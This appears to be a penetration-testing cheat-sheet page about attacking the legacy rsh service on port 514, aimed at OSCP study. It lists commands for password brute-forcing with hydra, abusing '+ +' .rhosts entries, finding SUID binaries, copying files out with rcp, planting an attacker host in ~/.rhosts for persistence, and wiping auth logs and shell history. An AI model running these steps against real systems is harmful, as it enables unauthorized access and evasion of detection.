Rsh - Port 514

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic Info

For authentication, .rhosts files along with /etc/hosts.equiv were utilized by Rsh. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.

Moreover, it was common for the .rhosts files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes.

Default port: 514

rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rsh domain/user@<IP> <Command>
rsh domain\\user@<IP> <Command>

Attack Vectors

Exploiting Weak Authentication

Check for weak authentication mechanisms. RSH often relies on the .rhosts file for authentication, which can be easily exploited if not properly configured.

Brute Force Attacks

You can perform brute-force attacks to guess weak passwords using tools like hydra:

hydra -l <username> -P /path/to/passwords.txt <target_ip> rsh

This command attempts to brute-force the specified RSH server.

Exploiting Misconfigurations

Look for misconfigured .rhosts files that allow unauthorized access. For example, a .rhosts file with the following entry can be exploited:

+ +

This entry allows any user from any host to log in without a password.

Post-Exploitation

Privilege Escalation

After gaining access, attempt to escalate privileges to a higher-level account. One common method is to search for SUID binaries:

rsh <remote-server-ip> -l <username> find / -perm -4000 -type f 2>/dev/null

This command lists all SUID binaries, which could potentially be exploited for privilege escalation.

Data Exfiltration

Once you have access, you can exfiltrate data from the remote machine. For example, you can copy files using the rcp (remote copy) command:

rcp <remote-server-ip>:<remote-file-path> <local-file-path>

Persistent Access

To maintain persistent access, you can add your SSH key to the ~/.ssh/authorized_keys file or modify the .rhosts file to allow your host:

echo "attacker-ip attacker-user" >> ~/.rhosts

This entry grants login permissions to the specified user on the attacker's IP address.

Covering Tracks

It's crucial to cover your tracks to avoid detection. You can delete log entries related to your activities:

rsh <remote-server-ip> -l <username> echo "" > /var/log/auth.log
rsh <remote-server-ip> -l <username> history -c

These commands clear the authentication log and command history.

Learn & practice For the OSCP.

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousRlogin - Port 513 NextLine Printer Daemon (LPD) - Port 515

Last updated 9 months ago

hashtagBasic Info

hashtagLogin

hashtagAttack Vectors​arrow-up-right

hashtagExploiting Weak Authentication​arrow-up-right

hashtagBrute Force Attacks​arrow-up-right

hashtagExploiting Misconfigurations​arrow-up-right

hashtagPost-Exploitation​arrow-up-right

hashtagPrivilege Escalation​arrow-up-right

hashtagData Exfiltration​arrow-up-right

hashtagPersistent Access​arrow-up-right

hashtagCovering Tracks​arrow-up-right